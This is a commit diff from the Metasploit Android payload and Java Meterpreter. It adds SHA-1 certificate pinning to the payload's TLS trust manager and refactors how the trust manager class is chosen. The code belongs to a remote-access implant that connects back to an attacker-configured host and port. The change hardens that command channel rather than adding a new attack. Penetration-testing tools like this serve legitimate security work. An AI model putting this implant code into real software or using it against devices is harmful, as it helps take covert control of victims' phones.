add ssl cert validation

java/androidpayload/app/src/com/metasploit/stage/Payload.java

@@ -19,6 +19,7 @@ import dalvik.system.DexClassLoader;
 public class Payload {
 
     public static final String URL =            "ZZZZ                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ";
+    public static final String CERT_HASH =      "WWWW                                        ";
     public static final String LHOST =          "XXXX127.0.0.1                       ";
     public static final String LPORT =          "YYYY4444                            ";
     public static final String RETRY_TOTAL =    "TTTT                                ";

java/androidpayload/app/src/com/metasploit/stage/PayloadTrustManager.java

@@ -42,6 +42,10 @@ import javax.net.ssl.SSLSession;
 import javax.net.ssl.TrustManager;
 import javax.net.ssl.X509TrustManager;
 
+import java.security.MessageDigest;
+import java.security.NoSuchAlgorithmException;
+import java.security.cert.CertificateEncodingException;
+import java.security.cert.CertificateException;
 import java.security.cert.X509Certificate;
 
 /**
@@ -57,14 +61,49 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
         return new X509Certificate[0];
     }
 
+    public static String getCertificateSHA1(X509Certificate cert)
+            throws NoSuchAlgorithmException, CertificateEncodingException {
+        MessageDigest md = MessageDigest.getInstance("SHA-1");
+        md.update(cert.getEncoded());
+        return bytesToHex(md.digest());
+    }
+
+    public static String bytesToHex(byte bytes[]) {
+        char[] hexDigits = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
+        StringBuilder buf = new StringBuilder(bytes.length * 2);
+        for (byte aByte : bytes) {
+            buf.append(hexDigits[(aByte & 0xf0) >> 4]);
+            buf.append(hexDigits[aByte & 0x0f]);
+        }
+        return buf.toString();
+    }
+
     public void checkClientTrusted(java.security.cert.X509Certificate[] certs,
                                    String authType) {
         // trust everyone
     }
 
     public void checkServerTrusted(java.security.cert.X509Certificate[] certs,
-                                   String authType) {
+                                   String authType) throws CertificateException {
-        // trust everyone
+
+        String payloadHash = Payload.CERT_HASH.substring(4).trim();
+        if (payloadHash.length() == 0) {
+            // No HandlerSSLCert set on payload, trust everyone
+            return;
+        }
+        if (certs == null || certs.length < 1) {
+            throw new CertificateException();
+        }
+        for (X509Certificate certificate : certs) {
+            try {
+                String serverHash = getCertificateSHA1(certificate);
+                if (!serverHash.equals(payloadHash)) {
+                    throw new CertificateException("Invalid certificate");
+                }
+            } catch (Exception e) {
+                throw new CertificateException(e);
+            }
+        }
     }
 
     public boolean verify(String hostname, SSLSession session) {

java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java

@@ -67,7 +67,6 @@ public class AndroidMeterpreter extends Meterpreter {
             // Post to the UI/Main thread and try and retrieve the Context
             final Handler handler = new Handler(Looper.getMainLooper());
             handler.post(new Runnable() {
-                @Override
                 public void run() {
                     try {
                         context = (Context) currentApplication.invoke(null, (Object[]) null);
@@ -100,6 +99,11 @@ public class AndroidMeterpreter extends Meterpreter {
         startExecuting();
     }
 
+    @Override
+    protected String getPayloadTrustManager() {
+        return "com.metasploit.stage.PayloadTrustManager";
+    }
+
     @Override
     public String[] loadExtension(byte[] data) throws Exception {
         getCommandManager().resetNewCommands();

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java

@@ -106,6 +106,10 @@ public class Meterpreter {
         }
     }
 
+    protected String getPayloadTrustManager() {
+        return "com.metasploit.meterpreter.PayloadTrustManager";
+    }
+
     /**
      * Write a TLV packet to this meterpreter's output stream.
      *
@@ -188,7 +192,7 @@ public class Meterpreter {
                     // load the trust manager via reflection, to avoid loading
                     // it when it is not needed (it requires Sun Java 1.4+)
                     try {
-                        Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
+                        Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
                     } catch (Exception ex) {
                         ex.printStackTrace(getErrorStream());
                     }